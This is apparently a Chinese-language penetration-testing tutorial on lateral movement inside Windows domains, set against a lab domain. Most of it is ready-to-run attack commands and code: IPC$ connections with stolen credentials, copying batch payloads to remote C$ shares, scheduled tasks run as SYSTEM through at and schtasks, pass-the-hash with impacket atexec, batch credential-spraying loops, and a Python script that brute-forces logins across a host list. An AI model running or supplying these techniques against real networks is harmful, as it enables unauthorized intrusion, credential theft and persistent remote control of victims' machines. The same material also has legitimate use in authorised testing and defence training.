1-橫向滲透明文傳遞at&schtasks思路
在拿下一台內網主機后,通過本地信息搜集收集用戶憑證等信息后,如何橫向滲透拿下更多的主機?這里僅介紹at&schtasks命令的使用,在已知目標系統的用戶明文密碼的基礎上,直接可以在遠程主機上執行命令。
獲取到某域主機權限
->minikatz得到密碼(明文,hash)
->用到信息收集里面域用戶的列表當做用戶名字典
->用到密碼明文當做密碼字典-》嘗試連接
->創建計划任務(at|schtasks)
->執行文件可為后門或者相關命令
利用流程(前提是已經知道目標電腦的用戶名和密碼)
1. 建立IPC鏈接到目標主機
2. 拷貝要執行的命令腳本到目標主機
3. 查看目標時間,創建計划任務(at、schtasks)定時執行拷貝到的腳本
4. 刪除IPC鏈接
net use \\server\ipc$"password" /user:username # 工作組建立IPC連接
net use \\server\ipc$"password" /user:domain\username #域內
dir \\xx.xx.xx.xx\C$\ # 查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat # 下載文件
copy 1.bat \\xx.xx.xx.xx\C$ # 復制文件
net use \\xx.xx.xx.xx\C$\1.bat /del # 刪除IPC
net view xx.xx.xx.xx # 查看對方共享
#建立IPC常見的錯誤代碼
(1)5:拒絕訪問,可能是使用的用戶不是管理員權限,需要先提升權限
(2)51:網絡問題,Windows 無法找到網絡路徑
(3)53:找不到網絡路徑,可能是IP地址錯誤、目標未開機、目標Lanmanserver服務未啟動、有防火牆等問題
(4)67:找不到網絡名,本地Lanmanworkstation服務未啟動,目標刪除ipc$
(5)1219:提供的憑據和已存在的憑據集沖突,說明已建立IPC$,需要先刪除
(6)1326:賬號密碼錯誤
(7)1792:目標NetLogon服務未啟動,連接域控常常會出現此情況
(8)2242:用戶密碼過期,目標有賬號策略,強制定期更改密碼
#建立IPC失敗的原因
(1)目標系統不是NT或以上的操作系統
(2)對方沒有打開IPC$共享
(3)對方未開啟139、445端口,或者被防火牆屏蔽
(4)輸出命令、賬號密碼有錯誤
[at] & [schtasks]
#at < Windows2012
net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator # 建立ipc連接:
copy add.bat \\192.168.3.21\c$ #拷貝執行文件到目標機器
at \\192.168.3.21 15:47 c:\add.bat #添加計划任務
#schtasks >=Windows2012
net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\administrator # 建立ipc連接:
copy add.bat \\192.168.3.32\c$ #復制文件到其C盤
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #創建adduser任務對應執行文件
schtasks /run /s 192.168.3.32 /tn adduser /i #運行adduser任務
schtasks /delete /s 192.168.3.21 /tn adduser /f#刪除adduser任務
2-橫向滲透明文HASH傳遞atexec-impacket(別人寫好的工具)
atexec.exe ./administrator:Admin12345@192.168.3.21 "whoami"
atexec.exe god/administrator:Admin12345@192.168.3.21 "whoami"
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"
3-橫向滲透明文HASH傳遞批量利用-綜合
FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #批量檢測IP對應明文連接
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量檢測IP對應明文回顯版
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami #批量檢測明文對應IP回顯版
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami #批量檢測HASH對應IP回顯版
4-橫向滲透明文HASH傳遞批量利用-升級版
前期除了收集明文密碼HASH等,還收集了用戶名,用戶名配合密碼字典能吃西瓜?
net use \\192.168.3.32\ipc$ admin!@#45 /user:god\dbadmin
#pip install pyinstaller
#pyinstaller -F fuck_neiwang_001.py 生成可執行EXE
import os,time
ips={
'192.168.3.21',
'192.168.3.25',
'192.168.3.29',
'192.168.3.30',
'192.168.3.31',
'192.168.3.33'
}
users={
'Administrator',
'boss',
'dbadmin',
'fileadmin',
'mack',
'mary',
'vpnadm',
'webadmin'
}
passs={
'admin',
'admin!@#45',
'Admin12345'
}
for ip in ips:
for user in users:
for mima in passs:
exec="net use \\"+ "\\"+ip+'\ipc$ '+mima+' /user:god\\'+user
print('--->'+exec+'<---')
os.system(exec)
time.sleep(1)